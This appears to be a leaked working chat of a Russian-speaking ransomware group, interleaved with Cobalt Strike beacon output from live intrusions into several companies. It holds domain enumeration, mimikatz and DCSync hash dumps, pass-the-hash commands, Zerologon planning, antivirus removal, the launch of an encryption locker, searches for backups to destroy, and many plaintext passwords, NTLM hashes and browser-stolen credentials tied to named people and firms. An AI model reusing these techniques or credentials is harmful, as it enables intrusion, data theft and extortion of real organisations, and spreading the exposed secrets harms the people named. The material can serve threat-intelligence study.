                             *NDLEADING_Computer_Ac*NDLEADING_All_Users
                             *NDLEADING_EQUIP_Repor*NDLEADING_EQUIP_Users
                             *NDLEADING_EQUIPRDB-FI*NDLEADING_EQUIPPatch_
                             *NDLEADING_All_Email *NDLEADING_ALL
                             *NDLEADING_Excel_Users*NDLEADING SharePoint
                             *NDLEADING_Citrix_Loca
The command completed successfully.

``````
User name ndcarhsherm
Full Name Hunter Sherman
Comment Hunter Sherman
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/20/2020 3:49:45 PM
Password expires 1/12/2021 3:49:45 PM
Password changeable 10/21/2020 3:49:45 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\ndcarhsherm
Last logon 10/22/2020 9:15:49 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_All_Users
                             *NDLEADING_EQUIP_Users*NDLEADING_SD_Schedule
                             *NDLEADING_All_Email *NDLEADING_SD_Technicians
                             *NDLEADING_SD_Users
The command completed successfully.

``````
User name ndmicjsater
Full Name Jason Sateren
Comment Michigan,ND
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/22/2020 6:49:57 AM
Password expires 1/14/2021 6:49:57 AM
Password changeable 10/23/2020 6:49:57 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\ndmicjsater
Last logon 10/22/2020 7:08:15 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_Password_Re
                             *NDLEADING_PARTS *NDLEADING_Dealer_Port
                             *NDLEADING_Computer_Ac *NDLEADING_All_Users
                             *NDLEADING_EQUIP_Repor*NDLEADING_EQUIP_Users
                             *NDLEADING_SD_Schedule*NDLEADING_EQUIPPatch_
                             *NDLEADING_All_Email *NDLEADING_SD_Managers
                             *NDLEADING_EQUIP_SDK_U*NDLEADING_SD_Admins
                             *NDLEADING_SD_Technicians*NDLEADING SharePoint
                             *NDLEADING_ALL *NDLEADING_SD_Users
                             *NDLEADING_Excel_Users*NDLEADING SharePoint
                             *NDLEADING_Citrix_Loca*NDLEADING_EQUIPRDB-AL
The command completed successfully.

``````
User name ndcartcarr
Full Name Theresa Carr
Comment Theresa Carr
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/20/2020 11:54:49 AM
Password expires 1/12/2021 11:54:49 AM
Password changeable 10/21/2020 11:54:49 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\ndcartcarr
Last logon 10/22/2020 7:02:59 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_Password_Re
                             *NDLEADING_Dealer_Port*NDLEADING_Computer_Ac
                             *NDLEADING_All_Users *NDLEADING_EQUIPRDB-SE
                             *NDLEADING_EQUIP_Users*NDLEADING_SD_Schedule
                             *NDLEADING_All_Email *NDLEADING_SD_Managers
                             *NDLEADING_SERVICE *NDLEADING_ALL
                             *NDLEADING SharePoint
The command completed successfully.


``````
User name nddevbernst
Full Name Blaine Ernst
Comment BLAINE ERNST
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/21/2020 6:22:54 AM
Password expires 1/13/2021 6:22:54 AM
Password changeable 10/22/2020 6:22:54 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory \\jdossn.local\homedirs\NDLEADING\nddevbernst
Last logon 10/22/2020 2:16:08 PM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *NDLEADING_Password_Re
                             *NDLEADING_Dealer_Port*NDLEADING_Computer_Ac
                             *NDLEADING_All_Users *NDLEADING_EQUIP_Users
                             *NDLEADING_SD_Schedule*NDLEADING_EQUIPPatch_
                             *NDLEADING_All_Email *NDLEADING_SD_Managers
                             *NDLEADING_EQUIP_SDK_U*NDLEADING_SD_Admins
                             *NDLEADING_SD_Technicians*NDLEADING_ALL
                             *NDLEADING_Excel_Users*NDLEADING_Citrix_Loca
                             *NDLEADING_EQUIPRDB-AL
The command completed successfully.

``если
```
>trustAttributes: 0 []
```
то можно считать, что траст не фурычит?shell net user username /domвывидете пожалуйстапо тем пользакам которые естьэто крайней случайзерологон?ну етораз там из 4 трастов только 1 по сути живой и тот пингуется с лоссом 100%а может етосэкономит времяно рекомендую командно инструмент освоитьтребует дополнительной настройки как видитеlsassy очень пригождаетсявот на случай когда есть некоторое количество кред`ndmicjsater` `ndcarddalma` `nddevbernst`ytnя вам не кидал вот такой инструмент?
https://github.com/Hackndo/lsassyа щас парням скинулаане. это я собирал все что попадалосьполучилось?``
pth W08872612198 "Remote Support" 296c19b3d2cb8e8729e5fe27f6cf764a

Username : nddevbernst
Password : NDleading2021!

LEADMIN Deere0419!

Username : ndcartcarr
Domain: JDOSSN
NTLM: b25a68a3d5bc30ea97872f6b004c58be
SHA1: d7a0e055c8e4b9947e48d99a66223a3dbe522bee

Username : ndmicjsater
Domain : JDOSSN
NTLM : c60a90ad0e486ae0efd1229b04824948
SHA1: 450a811afd21b2f402b34575cbca7f386a3b2a47
DPAPI: 5708598b47c3d8cea60c8bbd8d6d12bf

jason:1003:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:227a7d16ba750264459c885d666b7eaa:::

Username : ndcarhsherm
Domain : JDOSSN
NTLM: d7341bcb2ca0f8586c6f1974ead1ab1f
SHA1: c7b7b0db23a67ce02082c6351720a1fc5ac40d69
DPAPI: cfa41b24958547a50b0604ba6d0d04f6

Username : ndcardkolst
Domain : JDOSSN
NTLM : b9b6aa1456c1a351844910877a487cf9
SHA1: efae1f6b171a18bf4b16231fcc32d23df10e538e
DPAPI: a4dbe1e1a06257d0c44b1a009045169e

Username : ndcartcarr
Domain: JDOSSN
NTLM: 526ec72d381501fffb75e74934827f2f
SHA1: 9ccae5674e564db712b7a9be8ebcba4d754f57c9
DPAPI: c652bcd334907d5d084167b804d14ccf

 * Username : ndcarrtedro
 * Domain : JDOSSN
 * NTLM : c9e553f47018e2be97ec3307bd47df25
 * SHA1 : f6769930484ed5afd45e5aa95d1490e0fe2042e2
 
 * Username : ndcarjjohns
 * Domain : JDOSSN
 * NTLM : 4178a0f16bad0c2a649398e88994568c
 * SHA1 : ddc6c829305d0282c54b3fed400c67a999e71611
 * DPAPI: 4fdbb5025f3fec11c123375623d2287a
 * Username : ndcarjjohns
 * Domain : JDOSSN.LOCAL
 * Password : Ndleading11
 
 * Username : nddevkodell
 * Domain : JDOSSN
 * NTLM: 1ae22c3e605fcb0a1d17d7c0b8509281
 * SHA1: 780ca6033c42c3b6ab91fd119e5a1b4c2db2696f
 * DPAPI: 0f4bacdbd1dc64f63ecfda1d9c05d690
 
 * Username : ndcarddalma
 * Domain : JDOSSN
 * NTLM : db7aa0db0148b3b707b9ae6de91e3f25
 * SHA1: 9eaec33adae1e6193d9c381e449271008c5b0035
 * DPAPI: 830d9615902b542addd3faeeca02ba3e
``доброе утро странаuser9user8@tl2 добавь 8 и 9 сюдахостнейм домена не резолвится либо ловит 100% потерь?так ни разу не включался впн?eyJhbGciOiJBSOZdJej+HQUxGkLfwE47PNBlcVY5gpCszGI0B8JGEBEjaYYfWGMmRjxIL/OA+My9Eam/SwS6w5u3tuHdWvgE8MHaV9m41lLRFXJLfp+oI6mtpSZM1GvUMmMPRb6EdjioC1GX52kbuPOutrv2uatIfb4TIdld107GQ42OEOpX4evLdBdkBtrz17ob0wTqebQxGEBOh21ADZAzk4/9tbgbspvQaPahQttBzaWo4t8TVPwP39/sxLwtMm/DDv4ET0HZoF3torkbGe0pgRq6kCMZDeeePI6XTJzhLMDyUJzpfM3HTkxY3pxU03l+O3Bxgyve9MgfdoNcoKWPsjV1QxmLiUGyogc5QddtYfig64kBbRpBKzPpfb1lqVa5ktJiQkDxвсе, мой чижик домой ушел...есть один 2003. пробовал мс17, нетапи, блюкип, спулсс - все бестолку. Возможно 17-10 и сработает, но там креды нужны...37 штук видны всеготам видимых компов всего ничего, щас сопоставлю6 штук>operatingSystem: Windows Server 2003тогда не ждем хеши)а пароля от пользака неттолько сегодня домен появился. я же вчера вроде отписывался. домен за впном2 день в работе, вы только хеши сняли?там хотябы система нужна. а крест конечно рано ставить, только началидавайте сразу ставить крест на сети есть там учетка на входе не ДАредко хеши брутятсяредко бывает эетерналну редко там что то бывает...из 5 человек ни один не вспомнил?)я , кстати, забыл проверить в дескрипшнах. хорошо что напомнил)а словарь брутаа как же локальный админ где нибудьну нет среди админов и нет...видимо сканер сетевой может..среди админов нету``
>description: (Left 22/03/18) PW: L3av3r2018
``это кто/что?
dn:CN=RCP Scanning,OU=Ireland,OU=Ball Users,DC=ballymoregroup,DC=local
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: RCP Scanning
>sn: Scanning
>description: Scans123
``с шансом 50%)да нет, я пока в файлах ковыряюсь. но у него там такой пздц, что быстрее пароль расхэшится))[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=gB636LLSfv3w4ygbh) просто сидим и ждем?)?это шутка то?типа чего?а все остальное...?у юзака прав нигде нет, так что ждем хэши...ВПН
```
	server REG_SZ 46.34.1.2:4433
	domain REG_SZ LocalDomain
	user REG_SZ rpearce
	owner REG_SZ BALLYMOREGROUP\rpearce
``ДК
```
 Server Name IP Address
 ----------- ----------
 BALLY44HODC1 192.0.2.246
 BALLY35303 192.168.3.159
 EGDC2 192.168.200.160
 BGAZRDC01 10.0.180.6
``ЕА
```
Administrator CITAdmin
``ДА
```
Administrator AHarrison amihhaljova
aseymour bespadmin CITAdmin
completeit david.meadows isobtchak
jay.newell nreid rdeason
sdunn traubenheimer
``туда катят доменные кредывот кстати, раз линь в доменезначит там была цепочка из текушего в timesavers и оттуда через айтишников в линукс1.done,pkgprod.comтам сеть из 20 пк) идем к айтишникам да смотрим ихтам еще другой домен был``
192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS)
192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS)
``там прилетели еще сессии поэтому берем их в работу или доделываем из текущих открытыхОкей Кэпи на будущее блять не торопимся никогдаименно из SYSTEMименно из windows system32запуск всегда оттудаи на будущееОтработал из sys32готовоиз под винлогона пускаешь?или они ав подняли или еще чети сразу глянь процессы, стоит какой то аплокер?закинь в C:\windows\system32beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 7376-91FE

 Directory of C:\hp

10/20/2020 02:36 PM <DIR> .
10/20/2020 02:36 PM <DIR> ...
02/09/2017 11:57 PM 9,662 csIcon.ico
08/15/2019 11:04 AM <DIR> hpdiags
08/15/2019 10:57 AM <DIR> hpsmh
02/11/2014 10:11 AM <DIR> sslshare
10/20/2020 02:19 PM 189,440 start.exe
09/15/2016 12:46 AM 2,307 survey.dtd
10/20/2020 02:40 PM 189,440 Updater.exe
               4 File(s) 390,849 bytes
               5 Dir(s) 430,841,409,536 bytes freeдафайл на месте?откуда уверенность что вг нет бэкапов?+из под систем?сразуфайл попадает в корень сращуНе знаю файл не появляется. Мб он долго работает``
beacon> shell C:\hp\Updater.exe
[*] Tasked beacon to run: C:\hp\Updater.exe
[+] host called home, sent: 48 bytes
beacon> run C:\hp\Updater.exe
[*] Tasked beacon to run: C:\hp\Updater.exe
[+] host called home, sent: 35 bytes
beacon> execute C:\hp\Updater.exe
[*] Tasked beacon to execute: C:\hp\Updater.exe
[+] host called home, sent: 25 bytes
```почему?На ДК не отрабатывает локершифровать пока его не обрубили там бекапы и виртуалкиВсе зашифровано кроме дкпока домен не умерищите доступы в вгеще работануу, у них сейчас)
```
02:09 PM

``по хорошему часа через 4 только надо былд пускатьтак потому что не надо торопитьсяЭто поздно нашлизаебись)ДаLfа вы уже стали билд пускать?мм, вот уже интересно)``
[+] received output:
192.168.5.12:445

[+] received output:
192.168.5.13:445

[+] received output:
192.168.5.17:445 (platform: 500 version: 6.1 name: KEY2 domain: SAMBA)
192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS)
192.168.5.23:445
192.168.5.24:445

[+] received output:
192.168.5.25:445
192.168.5.26:445
192.168.5.27:445
192.168.5.28:445
192.168.5.30:445

[+] received output:
192.168.5.98:445 (platform: 500 version: 6.1 name: TSLINUX98 domain: WORKGROUP)
192.168.5.117:445 (platform: 500 version: 4.9 name: KEY domain: DMX)

[+] received output:
192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS)
192.168.5.188:445
192.168.5.229:445

[+] received output:
192.168.5.231:445
192.168.5.232:445
192.168.5.237:445

[+] received output:
192.168.5.240:445 (platform: 500 version: 4.9 name: TS-IX4A domain: WORKGROUP)
192.168.5.241:445 (platform: 500 version: 4.9 name: TS-IX4A domain: WORKGROUP)
192.168.5.242:445 (platform: 500 version: 4.9 name: TS-IX4B domain: WORKGROUP)
192.168.5.243:445 (platform: 500 version: 4.9 name: TS-IX4C domain: WORKGROUP)

[+] received output:
192.168.5.245:445 (platform: 500 version: 6.1 name: AS7004T-D8A5 domain: WORKGROUP)
192.168.5.246:445 (platform: 500 version: 6.1 name: AS7004T-D8E3 domain: WORKGROUP)
192.168.5.247:445 (platform: 500 version: 6.1 name: AS7004T-D8E5 domain: WORKGROUP)
192.168.5.248:445 (platform: 500 version: 6.1 name: AS7004T-D8BB domain: WORKGROUP)
Scanner module is complete
``````
/FORCEUNINSTALL Принудительно удаляет агент McAfee Agent из клиентской системы.

Пример: FrmInst.exe /FORCEUNINSTALL

``````
net share {sharename | devicename | drive:path} /DELETE
``````
 Share name Comment
 ---------- -------
 ADMIN$ Remote Admin
 C$ Default share
 IPC$ Remote IPC
 NETLOGON Logon server share
 Shares
 SYSVOL Logon server share
```
как шару удалить с ДК ?перекину группу в 1.doneотпишите как проставитесотв в .exe и как нибудь start.exe или типо тогону там .ex_Его переиминовать нужно? Расширение ?не забудьте что ДК в последнюю очередьвозьмем его)``
1CvlfdsVN58QacQDIsVVwk3cXrUrgRjXN3G4R1hrWSBzYkuyww5cteLGD4ryuGnv
``Да но нужно с бой решить какой кудавам выдали билд?1) на момент когда я получил сообщения ссылка уже была не действительна
2) я их не заказывалЯ тебе 16 го числа писалего надо готовить заранееу меня его тоже неттак в этом и сутьОт куда он у нас? Быстрей сделаем быстрей заемся другимии почему именно сейчас? время не подходящееа билд у вас есть?Нужно лочить быстрейДефендер отключилв общем подготовьтепоищите как макафи отклну там насы есть какие то?))http://www.pkgprod.com/поставим билд сегодняну ладно[ ](https://mediaeveryone.com/group/pkgprod-com?msg=uRSXzYBQkq78kpC9L) да и сайт у них есть)tyТам чувак сидит делами занимается за пк счета выставляет по 2k$``
pack3009
```на авлаб похоже просто)Есть возможность чекнуть 5c9f2b00a6b5cd75dc76e2adb3369271да и трастов нетпоставьте расскан /16чет полтора пк в сети...сейчас сделаюа вы пересняли ад инфо?```
2k12server - нет
frontdesk - макАфи
pkg-101 - макАфи
timeclocksql - нет
barbara-hp-2019 - макАфи винДэф
sales2-hp-2019 - макАфи винДэф
sales1-hp-2019 - макАфи
``````
[+] received output:
192.168.168.5:22 (SSH-2.0-OpenSSH_4.3)
192.168.168.1:22 (SSH-2.0-OpenSSH_7.2)
``угуЭто два локальных юзера``
500 Administrator 6f2cc106781ba05ddc908d6e32eb1838 66048
502 krbtgt d37d5fe30400ee01f2c2d09ba1b36d9a 514
``Всегда можно посмотреть ЛАесли ты про учетку администратора она не всегда лаТы угараешь?В дисинг\а как вы узнали ла на дк?На дк всегда можно залезть при наличии локального админа котрый есть в дисингедано вы сначала залезли на дк сначалаВсе по стандартной схемеи через setntlm вернулснял logonpasswords и там был старый хэш машиной учеткимагия))как?)починил)мы же не просто так ищем далекие тихие серверас дк вычистят на раз двапотому что тут тактика "прятаться у всех на глазах" не работаетпочемудк ни в коем случае не крепимНужен закреп на ДКкак только спалят могут начать чистить сетьзалезте подальшеbeacon> pth pkgprod\linux 5c9f2b00a6b5cd75dc76e2adb3369271Работает авторизация через ДАа именно Restore stepshttps://github.com/dirkjanm/CVE-2020-1472но у нас тут только 1 дкбыл вариант пульнуть зерологон на один из дк, снять дксинк
перепрыгнуть на соседний дк, снять хэшдамп и надеяться что там еще не пошла рекпликация и есть старый хэш машиной учетки. Вернуть страый хеш машиной учетки на первом дкдо зеро работало``
beacon> shell net user "Administrator" /dom
[*] Tasked beacon to run: net user "Administrator" /dom
[+] host called home, sent: 60 bytes
[+] received output:
The request will be processed at a domain controller for domain pkgprod.local.

System error 5 has occurred.

Access is denied.


```надо поискать решение этого вопроса после использованиядоменные учетки не будут работать теперьЭто админ DCпасс``
mts9475!
```без домена?beacon> pth .\Administrator 6f2cc106781ba05ddc908d6e32eb1838даCNA вариант?нет через кобальтно молодцы, через шарперологон сделали?структурируем сервера, ав, насы, виртуализации и т дэх, тогда торопимся)через зеро сделал?beacon> dcsync pkgprod.local
[Tasked beacon to run mimikatz's @lsadump::dcsync /domain:pkgprod.local /all /csv command
[+] host called home, sent: 438858 bytes
[+] received output:
[DC] 'pkgprod.local' will be the domain
[DC] '2k12server.pkgprod.local' will be the DC server
[DC] Exporting domain 'pkgprod.local'
502 krbtgt d37d5fe30400ee01f2c2d09ba1b36d9a 514
1135 zztest 6f2cc106781ba05ddc908d6e32eb1838 66048
1121 COMPUTER-1$ 9e4861eea9caaf03ab3741219905167e 4096
1125 JODY-PC$ 1be2a00d8363e7aa06a2be68e4e99576 4096
1117 PPCCOMP$ 1fe00279412bc69c535f95a6373c5a05 4096
1138 louisold fd5ee0e622e6f6c7526cc492cd509dc5 512
1143 timesavers eb026d6c093b199f57185a49a9fa324e 512
1148 micro2 1d414494cbe8c70c4321a26bfd6cc59b 66048
1131 DAN-HP$ d14820e4d9433a47e0ceddd48d0a06f6 4096
1130 louis fd5ee0e622e6f6c7526cc492cd509dc5 66048
1141 TONY-PC$ 9c906ae5277d876ace56baad914f0051 4096
1137 PKG-100$ 2817feb5c10f33de5e24b21737abf01b 4096
1119 SUE-PC$ 26efe407363f5d03e502639bd290659c 4096
1128 WENDY-PC$ f5439870ad6502228e07201dc7af491f 4096
1146 TELEMARKETING-H$ e068b3f3a033cd63d111c5bda50b3845 4096
1149 Spare 5af88c4732565f3cff7d8dd1f6ea314f 66048
1166 mtsi cdbb81ea052f92ce3e3a3208dfc2aade 66048
1165 PAC 3179b0258923f6e05ea684640e8e8a42 512
1150 Gretta 7b3785d867105a95e9cef80c4f7a722e 66048
1168 srivera c09783c159543b16d7c4830f743e3e60 66048
1127 jon 5af88c4732565f3cff7d8dd1f6ea314f 66048
1169 TED-LAPTOP$ 16be6f44317f74a831ee08618c6c4afd 4096
1123 TELEMARKET$ 3eb0a5d8c1a23495faa2d2c87b50d71e 4096
1129 JONM-PC$ dbeacb7d9a58c1bcc110c43bccace279 4096
1159 HP-TONY$ eec4fb89b81490d370b9d9ff6cfe1911 4096
1170 mhorgan 640d1d06d738a8ac7104f5ffe9343d5b 512
1140 linux 5c9f2b00a6b5cd75dc76e2adb3369271 66048
1151 FL1 1c145fb415625cbf7eb4a8079a8be5ef 66048
1142 tony 05b073daa9c1b3b909ff5ae2e4604bb5 66048
1132 rmg f0c158a0788788e5dc9e855a35020163 66048
1136 PKG-102$ 946d6fcb5d956bb6de2da361002d06a6 4096
1120 barb 50172476292c7784efcdf8da9d415a8f 66048
500 Administrator 6f2cc106781ba05ddc908d6e32eb1838 66048
1162 jess 9bed08d5afa9d00f06ff943c9fedd570 66048
1144 micro 1d414494cbe8c70c4321a26bfd6cc59b 66048
1116 telemkt 0dc70321eb7dd2aaf63d3e3f0d520dc3 66048
1139 PKG-101$ 57fd8fff3a57275d47ed819e98fb293d 4096
1133 frontdesk 5af88c4732565f3cff7d8dd1f6ea314f 66048
1118 jen 67ba48f6c118b9c433a79a40d1ba5984 66048
1152 FL2 1c145fb415625cbf7eb4a8079a8be5ef 66048
1147 TIMECLOCKSQL$ 4f4f2298cdbddb4564c82a43d570de2d 4096
1163 SALES1-HP-2019$ 511e98171aea1fa8da652bb7a4706523 4096
1134 FRONTDESK$ a4ef2d7813cc54616741cb7c09a0fbb9 4096
1160 BARBARA-HP-2019$ 17ad6d135f6f1a081e66b72e07541519 4096
1124 jody 13cdef39a416a4c50618630f7be02479 66048
1161 SALES2-HP-2019$ 83832d2cd61cfa87e26aee2548d6eced 4096
1126 wendy 9bed08d5afa9d00f06ff943c9fedd570 66048
1145 tele d7e35af358caba17dd77018cb86fb87d 66048
1167 Ted dd7a02d47fe222b5091ef2974c69b2ec 66048
1001 2K12SERVER$ 31d6cfe0d16ae931b73c59d7e0c089c0 532480Создает нулевые файлыугу тогда на завтра оставим``
beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\ProgramData\Adobe
beacon> run AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 28 bytes
[+] received output:

C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.

C:\ProgramData\Adobe>adfind.exe -f "objectcategory=computer" 1>ad_computers.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.

C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=organizationalUnit)" 1>ad_ous.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.

C:\ProgramData\Adobe>adfind.exe -subnets -f (objectCategory=subnet) 1>subnets.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.

C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=group)" 1>ad_group.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.

C:\ProgramData\Adobe>adfind.exe -gcb -sc trustdmp 1>trustdmp.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.


```но не дает снять ад?все пингуютсяне проверяла он пинговался?при сьеме данных писал чтьо контроллер не доступенпросто дк недостуен?Я не нашел софта для впнхм, за впном?Домен не доступенкербы не снимаютсятут в сети есть эксч?ад инфо обновили? кербы пересняли и т дНе нашли кредов для перехода. Брут по списку прервался зависанием ПК(не ходит на них, но почему то показываетони не админ шарыэто ловушкаадминшары есть``
\\TIMECLOCKSQL.pkgprod.local\ADMIN$ - Remote Admin
\\TIMECLOCKSQL.pkgprod.local\C$ - Default share
\\TIMECLOCKSQL.pkgprod.local\IPC$ - Remote IPC

[+] received output:
\\FRONTDESK.pkgprod.local\ADMIN$ - Remote Admin
\\FRONTDESK.pkgprod.local\C -
\\FRONTDESK.pkgprod.local\C$ - Default share
\\FRONTDESK.pkgprod.local\D$ - Default share
\\FRONTDESK.pkgprod.local\IPC$ - Remote IPC
\\FRONTDESK.pkgprod.local\print$ - Printer Drivers
\\FRONTDESK.pkgprod.local\Users -

[+] received output:
\\Sales2-HP-2019.pkgprod.local\ADMIN$ - Remote Admin
\\Sales2-HP-2019.pkgprod.local\C$ - Default share
\\Sales2-HP-2019.pkgprod.local\IPC$ - Remote IPC
\\Sales2-HP-2019.pkgprod.local\print$ - Printer Drivers
\\Sales1-HP-2019.pkgprod.local\ADMIN$ - Remote Admin
\\Sales1-HP-2019.pkgprod.local\C$ - Default share
\\Sales1-HP-2019.pkgprod.local\IPC$ - Remote IPC
\\Sales1-HP-2019.pkgprod.local\print$ - Printer Drivers
\\PKG-102.pkgprod.local\ADMIN$ - Remote Admin
\\PKG-102.pkgprod.local\C$ - Default share
\\PKG-102.pkgprod.local\D$ - Default share
\\PKG-102.pkgprod.local\E$ - Default share
\\PKG-102.pkgprod.local\IPC$ - Remote IPC
\\PKG-102.pkgprod.local\print$ - Printer Drivers

[+] received output:
\\PKG-101.pkgprod.local\ADMIN$ - Remote Admin
\\PKG-101.pkgprod.local\C$ - Default share
\\PKG-101.pkgprod.local\D$ - Default share
\\PKG-101.pkgprod.local\E$ - Default share
\\PKG-101.pkgprod.local\G$ - Default share
\\PKG-101.pkgprod.local\IPC$ - Remote IPC
\\PKG-101.pkgprod.local\print$ - Printer Drivers
\\Barbara-HP-2019.pkgprod.local\ADMIN$ - Remote Admin
\\Barbara-HP-2019.pkgprod.local\C$ - Default share
\\Barbara-HP-2019.pkgprod.local\IPC$ - Remote IPC
\\Barbara-HP-2019.pkgprod.local\print$ - Printer Drivers
\\2k12server.pkgprod.local\ADMIN$ - Remote Admin
\\2k12server.pkgprod.local\C$ - Default share
\\2k12server.pkgprod.local\IPC$ - Remote IPC
\\2k12server.pkgprod.local\NETLOGON - Logon server share
\\2k12server.pkgprod.local\Shares -
\\2k12server.pkgprod.local\SYSVOL - Logon server share

```пока ищем другие вариантыпо поводу чистки ехе, завтра будем решать`C:\Users\jess\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1`-не слышно от них ничего?нет сессийпосле закрытия просели на стотыщ часову меня две быловряд-ли, сейчас чекнунетсесии из крисп есть?конфу можно `amgusa.org`+туплю(`rawint.com`домен)``
172.93.109.18:51630
S36rQDbsTVH7D62swcBBexyxGkbNBFalsgx
```давай кобукак-то слишком много проебов сетокну раз офф, то дай мне тож тогда сетку#skytechinc-com от esxi ищем#henrystreet-org креды от сферы ищемтак чем заняты?Приветuser3 в пробке застрял, а так всевсе пришли?Привет:space_invader:всем приветспокойной ночидо завтразавтра к 5окей тогда на сегодня всеа, поняла их в сети 5не, там в сфере только три[ ](https://mediaeveryone.com/channel/general?msg=La7JvzhF8okm35g2o) мб сбросить?а и креды одни есть от трастав #corp-televisa-com-mx раскрутился и пробрался на сервак, получил новые креды, завтра как чел будет доступен закреплюсь на другой тачке и думаю на ДК всё таки попадуосталось найти керды от двух esxi и все готовоskytechinc.com
нашли еще два наса с бэкапами, всего 4
нашли керды от сферы, там три esxi, но в сети их 5, надо еще 2 найти паролив #henrystreet-org отсканены порты и проверены все веб морды, нейдены есхи и сфера, креды в процесе. Из хотя бы чего-то стоящего найденного мной:
```
https://login.symantec.com/sso/idp/SAML2
    it@henrystreet.org
    Hs$54321

https://my.vmware.com/web/vmware/login
    amendez@henrystreet.org
    H$$54321
``отпишите что за сегодня сделали``
[*] Beginning Google Chrome extraction.

--- Chromium Credential (User: mharper) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : map@waterway.com
Password : 7KA8JN&XHD4s

--- Chromium Credential (User: mharper) ---
URL : https://www.waterway.com/shop/my-account/
Username : markharper
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://www.waterway.com/shop/my-account/
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://github.com/session
Username : mharper@waterway.com
Password : LoveUnit14

--- Chromium Credential (User: mharper) ---
URL : https://internal.waterway.com/login
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://myaccount.google.com/
Username : waterwayapps@gmail.com
Password : wWj(9WZ&f}#z8}w^

--- Chromium Credential (User: mharper) ---
URL : https://www.paypal.com/signin
Username : markharper.pwlonghorns@gmail.com
Password : 88Maybe253!

--- Chromium Credential (User: mharper) ---
URL : https://login.live.com/ppsecure/post.srf
Username : waterwaytesting@gmail.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://login.live.com/ppsecure/post.srf
Username : markharper@markharper.net
Password : LoveUnit14

--- Chromium Credential (User: mharper) ---
URL : https://login.rackspace.com/
Username : wwMHarper
Password : Waterway99

--- Chromium Credential (User: mharper) ---
URL : https://stage.internal.waterway.com/login
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://ww5.autotask.net/ClientPortal/Login.aspx
Username : mharper@waterway.com
Password : LoveUnit14!

--- Chromium Credential (User: mharper) ---
URL : https://mockflow.com/checkLogin.jsp
Username : map@waterway.com
Password : 7KA8JN&XHD4s

--- Chromium Credential (User: mharper) ---
URL : https://sso-prod.insite360.gilbarco.com/auth/realms/people/login-actions/authenticate
Username : mharper@waterway.com
Password : LoveUnit14

--- Chromium Credential (User: mharper) ---
URL : https://login.live.com/ppsecure/post.srf
Username : waterwaytesting@gmail.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://internal.waterway.com/login
Username : markharper
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://www.amazon.com/ap/signin
Username : mharper@waterway.com
Password : 88Maybe253!

--- Chromium Credential (User: mharper) ---
URL : https://smile.amazon.com/ap/signin
Username : mharper@waterway.com
Password : 88Maybe253!

--- Chromium Credential (User: mharper) ---
URL : https://marketing.waterway.com/Account/Login
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://www.sendrecurring.com/login
Username : map@waterway.com
Password : JE04lvSfoZ5u

--- Chromium Credential (User: mharper) ---
URL : https://account.ui.com/login
Username : WaterwayIT
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://id.atlassian.com/signup/invite
Username : mharper@waterway.com
Password : LoveUnit14#

--- Chromium Credential (User: mharper) ---
